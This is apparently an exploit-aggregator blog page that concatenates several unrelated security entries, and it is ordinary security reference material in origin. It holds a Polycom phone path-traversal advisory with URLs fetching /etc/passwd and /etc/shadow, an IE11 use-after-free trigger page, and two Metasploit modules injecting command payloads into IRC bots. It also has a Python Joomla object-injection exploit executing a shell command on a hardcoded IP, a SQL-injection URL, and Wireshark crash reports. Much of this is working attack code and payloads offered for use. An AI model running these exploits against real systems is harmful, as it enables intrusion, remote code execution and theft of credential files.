Source: https://code.google.com/p/google-security-research/issues/detail?id=545
There is a type confusion issue during serialization if ObjectEncoder.dynamicPropertyWriter is overridden with a value that is not a function.
In the following ActionScript:
flash.net.ObjectEncoding.dynamicPropertyWriter = new subdpw();
var b = new ByteArray();
var a = {};
a.test = 1;
b.writeObject(a);
The object 'a' with a dynamic property 'test' is serialized using a custom dynamicPropertyWriter of class subpwd. However this class overrides writeDynamicProperties with a property that is not a function leading to type confusion (note that this is not possible in the compiler, the bytecode needs to be modified manually).
To reproduce the issue, load objectencoding.swf. PoC code is also attached. To use this code, compile the swf, and decompress it (for example, using flasm -x), and then search for the string "triteDocumentProperties" in the SWF and change it to "writeDocumentProperties".
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38970.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863119132
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Polycom VVX-Series Business Media Phones Path Traversal Vulnerability
--Summary--
Polycom VVX-series Business Media Phones allow authenticated users to execute file path traversal attacks
# Polycom
# http://www.polycom.com
--Affects--
# Polycom VVX 101, 201, 300, 310, 400, 410, 500, 600, & 1500
# UC Software 4.1.8 and earlier, 5.2.3 and earlier, 5.3.1 and earlier, 5.4.0 and earlier
--Details--
Polycom VVX-series IP phones provide a web administrative interface. Inside this interface we discovered two URLs that exposed a "file=filename" parameters. Due to unsafe file system operations in this interface, it is possible to exploit the following pages, and possibly others, using path traversal attacks:
http://a.b.c.d/Preferences/Ringtone?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://a.b.c.d/Preferences/Background?file=.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
--Mitigation--
Upgrade to the latest version of UC Software available.
Disable or restrict access to the web interface.
--Timeline--
# 6/16/2015: Notified Polycom about the issue
# 6/17/2015: Polycom responds, indicates it is investigating
# 6/18/2015: Polycom acknowledges vulnerability legitimacy
# 6/26/2015: Polycom waiting on estimate for fix from engineering
# 7/22/2015: Polycom provides with projected timelines for fixes
# 11/24/2015: Polycom confirms all VVX branches are patched
# 12/9/2015: Polycom issues public vulnerability advisory
--References--
https://depthsecurity.com/blog/polycom-vvx-series-business-media-phones-path-traversal-vulnerability
http://supportdocs.polycom.com/PolycomService/support/global/documents/support/documentation/VVX_Path_Traversals_v_1_0.pdf
Jake Reynolds
Partner/Principal Consultant
www.depthsecurity.com
<!--
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de
BFS-SA-2015-003 10-December-2015
________________________________________________________________________________
Vendor: Microsoft, http://www.microsoft.com
Affected Products: Internet Explorer
Affected Version: IE 11
Vulnerability: MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152
________________________________________________________________________________
I. Impact
This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.
________________________________________________________________________________
II. Vulnerability Details
Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).
The following HTML page can be used to reproduce the issue:
-->
<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<style>
small{ -ms-block-progression: lr; -ms-filter: "vv"; }
</style>
<script>
function trigger() { document.execCommand("JustifyLeft"); }
</script>
<nolayer>blue<small>frost</small>
<applet><tt>security</applet>
<script>trigger();</script>
</html>
<!--
With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:
(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f7402400000300 test dword ptr [eax+24h],30000h ds:002b:09b09eb4=????????
0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04: 9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
77e1ae8a ntdll!RtlpFreeHeap+0x0000005d
77dc2b65 ntdll!RtlFreeHeap+0x00000142
758814ad kernel32!HeapFree+0x00000014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
6d95577e MSHTML!GlobalWndProc+0x0000012e
770762fa user32!InternalCallWinProc+0x00000023
77076d3a user32!UserCallWinProcCheckWow+0x00000109
770777c4 user32!DispatchMessageWorker+0x000003bc
7707788a user32!DispatchMessageW+0x0000000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
7588336a kernel32!BaseThreadInitThunk+0x0000000e
77dc9882 ntdll!__RtlUserThreadStart+0x00000070
77dc9855 ntdll!_RtlUserThreadStart+0x0000001b
We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.
0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
9b01f04: 9b09e90 170 - 9b09000 2000
MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77e6134e ntdll!RtlDebugAllocateHeap+0x00000030
77e1b16e ntdll!RtlpAllocateHeap+0x000000c4
77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8
6df17172 MSHTML!CHtmParse::ParseToken+0x00000096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7
6dd8341b MSHTML!CHtmPost::Exec+0x00000207
6da308a8 MSHTML!CHtmPost::Run+0x0000003d
6da3080e MSHTML!PostManExecute+0x00000061
6da2727c MSHTML!PostManResume+0x0000007b
6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
6d95577e MSHTML!GlobalWndProc+0x0000012e
770762fa user32!InternalCallWinProc+0x00000023
77076d3a user32!UserCallWinProcCheckWow+0x00000109
770777c4 user32!DispatchMessageWorker+0x000003bc
7707788a user32!DispatchMessageW+0x0000000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
7588336a kernel32!BaseThreadInitThunk+0x0000000e
77dc9882 ntdll!__RtlUserThreadStart+0x00000070
77dc9855 ntdll!_RtlUserThreadStart+0x0000001b
________________________________________________________________________________
III. Mitigation
The issue was fixed in MS15-124 which should be installed to resolve the issue.
________________________________________________________________________________
IV. Disclosure Timeline
- 2015-08-04 Vulnerability reported to secure@microsoft.com
- 2015-09-24 Microsoft confirms that they successufully reproduced the issue
- 2015-12-08 Microsoft resolves issue in MS15-124
________________________________________________________________________________
Credit:
Bug found by Moritz Jodeit of Blue Frost Security GmbH.
________________________________________________________________________________
Unaltered electronic reproduction of this advisory is permitted. For all other
reproduction or publication, in printing or otherwise, contact
research@bluefrostsecurity.de for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In no
event shall Blue Frost Security be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if Blue Frost Security has been advised of the
possibility of such damages.
Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply.
-->
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Legend Perl IRC Bot Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution on the Legend Perl IRC Bot .
This bot has been used as a payload in the Shellshock spam last October 2014.
This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
UDP flooding, the ability to remove system logs, and ability to gain root, and
VNC scanning.
Kevin Stevens, a Senior Threat Researcher at Damballa has uploaded this script
to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
},
'Author' =>
[
'Jay Turla' # msf and initial discovery
#MalwareMustDie
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '121681' ],
[ 'EDB', '36836' ],
[ 'URL', 'https://www.damballa.com/perlbotnado/' ],
[ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
],
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'Legend IRC Bot', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 27 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def legend_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
legend_command(sock)
quit(sock)
disconnect
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
'Description' => %q{
This module allows remote command execution on an IRC Bot developed by xdh.
This perl bot was caught by Conor Patrick with his shellshock honeypot server
and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
Thayer also found this script which has a description of LinuxNet perlbot.
The bot answers only based on the servername and nickname in the IRC message
which is configured on the perl script thus you need to be an operator on the IRC
network to spoof it and in order to exploit this bot or have at least the same ip
to the config.
},
'Author' =>
[
#MalwareMustDie
'Jay Turla', # msf
'Conor Patrick', # initial discovery and botnet analysis for xdh
'Matt Thayer' # initial discovery for LinuxNet perlbot
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
[ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
[ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
],
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'xdh Botnet / LinuxNet perlbot', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 04 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def xdh_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
xdh_command(sock)
quit(sock)
disconnect
end
end
'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests # easy_install requests
def get_url(url, user_agent):
headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
pl = generate_payload("system('touch /tmp/fx');")
print get_url("http://172.31.6.242/", pl)
source: https://www.securityfocus.com/bid/64707/info
Command School Student Management System is prone to the following security vulnerabilities:
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.
http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
Source: https://code.google.com/p/google-security-research/issues/detail?id=641
The following crash due to a stack-based out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==2067==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe26462c20 at pc 0x0000009cf704 bp 0x7ffe26462b70 sp 0x7ffe26462b68
READ of size 4 at 0x7ffe26462c20 thread T0
#0 0x9cf703 in getRate wireshark/wiretap/vwr.c:2276:20
#1 0x9c74f7 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1533:25
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe26462c20 is located in stack of thread T0 at offset 160 in frame
#0 0x9cf32f in getRate wireshark/wiretap/vwr.c:2261
This frame has 6 object(s):
[32, 80) 'canonical_rate_legacy'
[112, 144) 'canonical_ndbps_20_ht'
[176, 208) 'canonical_ndbps_40_ht' <== Memory access at offset 160 underflows this variable
[240, 276) 'canonical_ndbps_20_vht'
[320, 360) 'canonical_ndbps_40_vht'
[400, 440) 'canonical_ndbps_80_vht'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2276:20 in getRate
Shadow bytes around the buggy address:
0x100044c84530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c84570: f1 f1 f1 f1 00 00 00 00 00 00 f2 f2 f2 f2 00 00
=>0x100044c84580: 00 00 f2 f2[f2]f2 00 00 00 00 f2 f2 f2 f2 00 00
0x100044c84590: 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 00 f2 f2 f2
0x100044c845a0: f2 f2 00 00 00 00 00 f3 f3 f3 f3 f3 00 00 00 00
0x100044c845b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100044c845d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2067==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11789. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39006.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=642
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==2992==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe9b2a2fc0 at pc 0x0000004c1386 bp 0x7ffe9b2a0f70 sp 0x7ffe9b2a0720
WRITE of size 43264 at 0x7ffe9b2a2fc0 thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x4189c2b in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:713:9
#2 0x29525e9 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17767:9
#3 0x2924581 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#4 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#6 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#7 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#8 0x28d825c in dissect_wlan_radio wireshark/epan/dissectors/packet-ieee80211-radio.c:976:10
#9 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#10 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#11 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#12 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#13 0x28e5df4 in dissect_radiotap wireshark/epan/dissectors/packet-ieee80211-radiotap.c:1796:2
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#17 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#21 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#22 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#23 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#24 0x53c91b in process_packet wireshark/tshark.c:3728:5
#25 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#26 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffe9b2a2fc0 is located in stack of thread T0 at offset 8256 in frame
#0 0x418907f in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:630
This frame has 5 object(s):
[32, 44) 'id'
[64, 8256) 'tmp_data'
[8512, 8516) 'tmp_len' <== Memory access at offset 8256 partially underflows this variable
[8528, 8544) 'id.coerce' <== Memory access at offset 8256 partially underflows this variable
[8560, 8576) 'id.coerce83' <== Memory access at offset 8256 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x10005364c5a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10005364c5f0: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2
0x10005364c600: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x10005364c610: f2 f2 f2 f2 f2 f2 f2 f2 04 f2 00 00 f2 f2 00 00
0x10005364c620: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10005364c640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2992==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11790. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39005.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=643
The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3901==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadbc852d at pc 0x0000009cea23 bp 0x7ffeadbbf650 sp 0x7ffeadbbf648
READ of size 1 at 0x7ffeadbc852d thread T0
#0 0x9cea22 in find_signature wireshark/wiretap/vwr.c:2214:17
#1 0x9c5066 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1435:15
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
Address 0x7ffeadbc852d is located in stack of thread T0 at offset 32813 in frame
#0 0x9bbbcf in vwr_process_rec_data wireshark/wiretap/vwr.c:2320
This frame has 1 object(s):
[32, 32800) 'rec' <== Memory access at offset 32813 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2214:17 in find_signature
Shadow bytes around the buggy address:
0x100055b71050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100055b71090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
